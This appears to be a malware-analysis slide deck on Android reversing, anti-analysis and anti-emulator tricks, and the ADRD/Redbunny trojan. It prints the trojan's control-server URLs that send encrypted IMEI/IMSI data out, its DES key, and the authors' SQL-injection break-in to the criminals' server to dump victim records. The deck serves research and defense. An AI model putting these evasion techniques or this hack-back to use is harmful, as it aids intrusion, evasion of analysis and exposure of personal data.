The document discusses the Android architecture and tools used for analyzing Android applications. It describes analyzing the Red Bunny (ADRD) malware sample in detail, including decrypting communications, analyzing database schemes and control servers, and examining updated application payloads. Dynamic analysis techniques are outlined for monitoring an emulator or device in real time.
DALVIK VM
- Register-based virtual machine.
- Uses its own bytecode, not Java bytecode.
- Runs on a slow CPU with little RAM.
- Runs on an operating system without swap space.
- Optimized for memory efficiency.
- Dex class file format.
Dex file format
- header
- string_ids
- type_ids
- proto_ids
- field_ids
- method_ids
- class_defs
- data
Anti-analysis
Examples:
- Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems.
- Medium: Optimize/obfuscate the code with ProGuard.
- Hard: Modify the bytecode to break reversing tools (be sure that it still runs on Dalvik).
  E.g. androguard-a1:
    if self.__value_type >= VALUE_SHORT :
        ...
    elif self.__value_type == VALUE_ARRAY :
        ...
    elif self.__value_type == VALUE_BYTE :
        ...
    elif self.__value_type == VALUE_NULL :
        ...
    elif self.__value_type == VALUE_BOOLEAN :
        ...
    else :
        raise("oops")
  Insert an encoded value of type VALUE_ANNOTATION: no branch handles it, so the parser falls through to the else and raises "oops".
Dynamic Analysis
Advanced:
- Create your own system image and modify the Java classes to log the program flow. Example: framework/base/core/java/android/os/Process.java
Anti-VM
- Detecting the emulator is very easy:
  DEVICE_ID:
    String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);
    boolean emulator = TextUtils.isEmpty(id);
  Solution:
    Change secure->android_id in data/data/com.android.providers.settings/databases/settings.db
  IMSI:
    TelephonyManager manager = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
    String imsi = manager.getSubscriberId(); // 00000... on the emulator
  Solution:
    Patch the emulator binary (search for the +CGSN string) or the emulator source code (external/qemu/telephony/android_modem.c).
More Anti-VM
- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
- Detect ADB stuff: process, network, debug enabled...
- /proc/cpuinfo -> Hardware: Goldfish
- vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn't change)
  (Thanks Ehooo)
- Qemu-specific detection (Google)
Solution:
Patch emulator, Qemu, system hooking...
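As an added example (not from the slides), a small Python checker an analyst can run over probe outputs collected from an emulator image to confirm the fingerprints listed above are actually hidden before a sample is executed. The probe values are constructed, not captured; the all-zero-MSIN IMSI pattern and the adbd process name are assumptions about the stock emulator image.

```python
import re

# Constructed probe outputs for a stock, unpatched Android emulator
# (not captured from a real device; the IMSI and adbd values are assumptions
# about the default emulator image).
UNPATCHED = {
    "android_id": "",                   # Settings.Secure.ANDROID_ID is empty
    "imsi": "310260000000000",          # getSubscriberId(): MSIN is all zeros
    "cpuinfo": "Processor\t: ARMv7 Processor rev 0 (v7l)\n"
               "Hardware\t: Goldfish\nRevision\t: 0000\n",
    "ps": "root 1 0 /init\nroot 52 1 /sbin/adbd\nsystem 88 1 system_server\n",
}

# Same probes after applying the fixes from the slides (settings.db edited,
# modem answer patched, cpuinfo hidden, adbd stopped). Also constructed.
PATCHED = {
    "android_id": "3f1c9a0d77b2e4a5",
    "imsi": "460001234567890",
    "cpuinfo": "Processor\t: ARMv7 Processor rev 0 (v7l)\n"
               "Hardware\t: herring\nRevision\t: 0000\n",
    "ps": "root 1 0 /init\nsystem 88 1 system_server\n",
}


def emulator_indicators(probes):
    """Return the emulator fingerprints from the slides that are still visible.

    probes maps a probe name to the raw text an analyst collected from the
    image (settings query, telephony query, /proc/cpuinfo, process list).
    """
    found = []
    if not probes.get("android_id"):
        found.append("android_id_empty")
    # Stock emulator IMSI: MCC+MNC (5-6 digits) followed by an all-zero MSIN.
    if re.fullmatch(r"\d{5,6}0{9,10}", probes.get("imsi", "")):
        found.append("imsi_all_zeros")
    hw = re.search(r"^Hardware\s*:\s*(.+)$", probes.get("cpuinfo", ""), re.M)
    if hw and "goldfish" in hw.group(1).lower():
        found.append("cpuinfo_goldfish")
    # "Detect ADB stuff": the adb daemon showing up in the process list.
    if re.search(r"\badbd\b", probes.get("ps", "")):
        found.append("adbd_running")
    return found


if __name__ == "__main__":
    for name, probes in (("unpatched", UNPATCHED), ("patched", PATCHED)):
        print(name, "->", emulator_indicators(probes) or "clean")
```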
Alternatives to Android Emulator
- http://www.android-x86.org/ . Supports VMware
- Use a real phone... Slower
Attack Vectors
- Alternative markets, repackaged applications.
- SMS, MMS vulnerabilities, fuzzing!
- Wireless, Bluetooth drivers.
- NFC.
- System components: WebKit, sound library, kernel.
Third party software
Source: http://android.git.kernel.org/
ADRD aka Redbunny
- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" (http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1)
- Notification: "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]"
- Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011:
  * Name: com.beautyfullivewallpaper
  * Date: Feb. 2, 2011, 1:49 p.m.
- Also known as HongTouTou
Detection
- Sends HTTP requests through a proxy:
  * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http");
  * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);
- Services:
  * com.xxx.yyy.MyService
  * .beauty.Beauty
- Intents:
  * android.intent.action.BOOT_COMPLETED -> starts at system boot
  * android.intent.action.PHONE_STATE
  * android.net.conn.CONNECTIVITY_CHANGE
Analysis I
- (1) Service module (MyService):
  * Sets a proxy for GET/POST and specially crafted HTTP headers (UA, MIME types).
  * Sets the preferred APN.
  * Runs every 12 hours.
- (2) Looks for a specific APN network: "CMWAP" || "UNIWAP"
- (3) Cipher data module: public static String encrypt/decrypt, built on
    Cipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
  Sends data to adrd.taxuan.net/index.aspx?im=%s: IMEI + IMSI + Netway (preferred APN) + iversion + oversion
- (4) Loop: decrypt the response, then Switch(cmd) (it depends on the …):
  * 0 Do nothing
  * 1 adad.StartGo()
  * 2 ParseO
  * 3 UpdateHelper()
- (5) adad.StartGo():
  * Sends http://adrd.xiaxiab.com/pic.aspx?im= + encrypt(IMEI+IMSI)
  * Parses the big list of urls/referers, e.g. B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1
  * BBBB.Go() -> retrieves search lists from wap.baidu.com
  * FixUrls(): sends random requests adding BAIDU_WISE_UID and HTTP_HEADERS
- (6) UpdateHelper installs the update apk. ParseO(): parses the server response (number, flags, tags..), e.g. T213607170863|12345|+ -10086+ abc -597| [ '
  Sends log data to the control servers.
Analysis II
- Following the encryption routines, the DES key is found: this.kk = "48734154";
- UpdateHelper class (excerpt):
    public class UpdateHelper
    {
        private static String savefilepath = "/myupdate.apk";
        private Context ct;
        private int netway;
- Benefits from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom), and also from SMS charges.
- Server URLs (there are more):
  http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA
  http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
- We want to know more!!
Control Servers
- adrd.xiaxiab.com at a glance:
  * Microsoft-IIS/6.0
  * Debug enabled (displaying .NET errors and backtraces)
  * Hidden paths to the .NET/aspx application
  * ALL is Chinese! (WTF!?!"·$%&/(?)
- Possible attack vectors:
  * HTTP functions + DES key + pyDes = "legal" HTTP requests (at least for the adrd server)
Control Servers
- First results:
  * Exceptions in Chinese. Google Translate is your friend.
  * Errors in .NET (it didn't generate any HTML list/table or view to use for displaying data).
  * We got a successful SQL injection after the last ciphered parameter :D
  * User without admin privileges.
  * Permissions to run backups + shared resources = timeout
  * Other possibilities:
    + 1: Create a temporary DB with just one table each time, dump paginated rows and run backups. Problem: complex to do and complex to rebuild the original DB (also the language didn't help).
    + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES in the HTTP logs, and it's not usual to log all the DB queries, for performance reasons).
Database Information
- All the schema obtained: list of tables, fields, types, stored procedures
- IMEI/IMSI list (at least some of them), logs, keywords, Baidu accounts
- The main stored procedure affected by the SQL injection retrieves the URL of myupdate.apk, which points to adrd.xiaxiab.com/down.aspx!
  * Parameters:
    @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
  * Stored procedure:
    --if (@netwap=2)
    select 'T-1|T11'
    --select 'T3http://adrd.xiaxiab.com/down.aspx'
    --select 'T213607170863|12345|+ -10086+ abc -597| [ '
    --else
    --select 'T013607170863'
  * It looks like they were considering the netwap (based on the mobile operator) as a criterion for sending commands
  * TX (where X seems to be a command type)
  * 13607170863 is a phone number located in Wuhan
Myupdate.apk
- It uses the main package of the ADRD family, xxx.yyy.
- The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS...
- Looks like a Google reader
- It adds a local SQLite DB (keyword storage):
  go_g1_sms: id, keyword, type, flag
  go_g2_sms: id, keyword, keyword2
- SMSObserver:
  * Replaces keywords in SMSs.
  * Sends SMS!
Infections
- Infections by operator: +20K different IMSIs
- Other affected operators:
  Far EasTone
  Peoples Telephone Company
  Hutchison 3G
  PCCW Mobile Sunday
  Hong Kong Telecom
  SmarTone Mobile
Thank You! Questions?
@jaimeblascob
@PabloForThePPL